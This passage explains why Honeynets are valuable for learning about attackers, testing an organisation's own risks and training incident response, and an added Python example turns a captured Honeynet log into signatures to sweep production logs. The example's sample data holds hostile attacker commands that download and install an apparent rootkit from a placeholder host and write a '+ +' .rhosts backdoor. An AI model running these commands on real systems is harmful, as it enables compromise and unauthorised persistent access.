Value of a Honeynet
Traditionally, information security has been defensive. Firewalls, intrusion detection systems, encryption: all these mechanisms are used defensively to protect one's resources. The strategy is to defend the organization as well as possible, detect any failures in that defense, and then react to those failures. The problem with this approach is that it is purely defensive; the enemy holds the initiative and is on the attack. Honeynets attempt to turn the tables, giving organizations the initiative. The primary purpose of a Honeynet is to gather intelligence about the enemy. With that intelligence, an organization can potentially stop an attack, or close a gap in its defenses, before the attack happens. Information security has often been compared to the military, such as the defense of a castle or guerrilla warfare. Regardless of the analogy you choose, organizations can take the initiative by learning about the enemy before it strikes.
For example, one of the primary communication channels blackhats use is IRC (Internet relay chat). Blackhats tend to communicate freely among themselves, revealing their motives, goals, and actions. We have captured these conversations through the use of Honeynets, monitoring every word. We have even captured real-time video shots of blackhats involved in the attacks on our Honeynet. Once, we tracked blackhats compromising hundreds of systems for the sole purpose of attacking the infrastructure of a specific country. We then relayed this information to organizations that were compromised by these individuals. We also warned the country of the impending attack, thereby mitigating the effectiveness of the blackhat attacks. We were able to specify the attackers' exact tools and methodology, tipping off these organizations with specific information to better react to and defeat the threat. You can read more about this incident in Chapter 11.
Honeynets also provide an organization with intelligence on its own security risks and vulnerabilities. Honeynets can consist of the same systems and applications that the organization is using for its production environment. This allows you to identify the risks and vulnerabilities that may exist in your production environment. For example, if your organization depended on Microsoft NT IIS (Internet Information Server) with a database back end for its Web server application, you could build a Honeynet with those components, allowing you to identify any risks existing in that environment. You can also use systems that you want to test or are considering for deployment. Perhaps you are considering a new load balancer or switch and have concerns about possible risks. The Honeynet gives you an environment in which you can test those risks. Often, these same risks may be missed in your production environment, owing to data overload. The production network entails so much activity that it is difficult to determine what is malicious activity and what is normal day-to-day network traffic. However, within the controlled environment of the Honeynet, these risks are easier to identify.
Furthermore, Honeynets can help an organization develop its incident-response capabilities. Over the past two years, the Honeynet Project has vastly improved our abilities to detect, react to, recover, and analyze systems that have been compromised. After numerous system compromises, we have perfected a variety of techniques. You can read more on these techniques in Chapter 6, Analyzing a Compromised System, and Chapter 8, Forensic Challenge. Traditionally, when you analyze a compromised system, you have no idea whether your analysis is correct; you can make only a best guess. The advantage one has in analyzing Honeynet compromised systems is that you already have most of the answers, as you captured every packet and keystroke sent to the system. You can then treat a compromised system as a "challenge," testing your abilities to determine what happened by using various forensic techniques. You can then compare these results to the data captured from within the Honeynet. This information can also be used to determine whether any other systems in your production network have been compromised. Once you have identified the signatures of the blackhat and the attacks, you can then review your production environment for the same signatures, identifying compromised systems you did not know about.
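The two ideas above, that nothing legitimate ever talks to a Honeynet (so every connection and keystroke captured there is attacker activity), and that signatures derived from that capture can be swept across production to find compromises you did not know about, can be shown in a few dozen lines. The following is an added example, not code from the book or the Honeynet Project. The log format, the Honeynet subnet (192.0.2.0/24, a documentation range), the attacker addresses and the command lines are all constructed for illustration.

```python
"""
Added example (not from the book): turn a Honeynet capture into
signatures, then sweep production logs for the same signatures.

Assumptions (all constructed for illustration):
- The sensor writes one record per line: a connection ("conn") with a
  destination port, or a captured keystroke line ("keys") with the
  command typed.
- Production hosts export records in the same shape.
- The Honeynet occupies 192.0.2.0/24 and hosts no production service,
  so any inbound connection to it is hostile by definition.
"""
import ipaddress
import re
from collections import defaultdict

HONEYNET = ipaddress.ip_network("192.0.2.0/24")

# Constructed Honeynet capture: every packet and keystroke sent to the sensor.
HONEYNET_LOG = """\
conn src=198.51.100.7 dst=192.0.2.10 dport=21
conn src=198.51.100.7 dst=192.0.2.10 dport=21
keys src=198.51.100.7 dst=192.0.2.10 cmd=wget http://198.51.100.9/rk.tgz
keys src=198.51.100.7 dst=192.0.2.10 cmd=tar xzf rk.tgz; ./install
keys src=198.51.100.7 dst=192.0.2.10 cmd=echo "+ +" > /root/.rhosts
conn src=203.0.113.44 dst=192.0.2.11 dport=111
"""

# Constructed production logs from hosts outside the Honeynet.
PRODUCTION_LOG = """\
conn src=10.1.1.5 dst=10.1.2.20 dport=80
conn src=198.51.100.7 dst=10.1.2.20 dport=21
keys src=198.51.100.7 dst=10.1.2.20 cmd=wget http://198.51.100.9/rk.tgz
conn src=10.1.1.9 dst=10.1.2.21 dport=80
conn src=10.1.1.5 dst=10.1.2.22 dport=22
"""

LINE_RE = re.compile(
    r"^(?P<kind>conn|keys) src=(?P<src>\S+) dst=(?P<dst>\S+)"
    r"(?: dport=(?P<dport>\d+))?(?: cmd=(?P<cmd>.*))?$"
)
URL_RE = re.compile(r"https?://([\w.-]+)")


def parse(log: str):
    """Yield one dict per well-formed record; ignore anything else."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def honeynet_signatures(log: str) -> dict:
    """Derive indicators from a Honeynet capture.

    Because no legitimate traffic reaches the Honeynet, every source that
    connects to it is an attacker, every command typed is part of the
    attacker's methodology, and every host named in a download URL is
    attacker infrastructure. No baseline of "normal" traffic is needed.
    """
    sigs = {"sources": set(), "infra": set(), "commands": set(), "ports": set()}
    for rec in parse(log):
        if ipaddress.ip_address(rec["dst"]) not in HONEYNET:
            continue  # not inbound to the Honeynet; out of scope here
        sigs["sources"].add(rec["src"])
        if rec["dport"]:
            sigs["ports"].add(int(rec["dport"]))
        if rec["cmd"]:
            sigs["commands"].add(rec["cmd"])
            sigs["infra"].update(URL_RE.findall(rec["cmd"]))
    return sigs


def sweep_production(log: str, sigs: dict) -> dict:
    """Map each production host to the Honeynet-derived indicators it
    matches, so it can be triaged as a possible unknown compromise."""
    hits = defaultdict(set)
    for rec in parse(log):
        host = rec["dst"]
        if rec["src"] in sigs["sources"]:
            hits[host].add(f"contact from known attacker {rec['src']}")
        if rec["cmd"]:
            if rec["cmd"] in sigs["commands"]:
                hits[host].add(f"attacker command seen: {rec['cmd']}")
            for h in URL_RE.findall(rec["cmd"]):
                if h in sigs["infra"]:
                    hits[host].add(f"download from attacker infrastructure {h}")
    return {h: sorted(r) for h, r in hits.items()}


if __name__ == "__main__":
    sigs = honeynet_signatures(HONEYNET_LOG)
    for host, reasons in sweep_production(PRODUCTION_LOG, sigs).items():
        print(host)
        for reason in reasons:
            print("  -", reason)
```

Run as a script it reports 10.1.2.20, which was contacted by the same source, fetched the same archive from the same host, and ran the same command the Honeynet recorded. In practice the signatures would be expressed in your IDS's rule language and the sweep run over real connection and shell logs, but the logic is the same: the Honeynet supplies ground truth with no noise, and production is searched for the matches.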
Over the years, we have discovered another advantage of Honeynets: They teach us a lot about not only the blackhat community but also ourselves and our security capabilities. A Honeynet is nothing more than a highly controlled lab that you put out on your network or on the Internet. You learn when blackhats compromise systems on the Honeynet. However, you also learn a great deal just setting one up and maintaining it. While working with Honeynets, we have learned extensively about logging, IDSs, forensics, network traffic analysis, system hardening, kernel modules, and a variety of other techniques.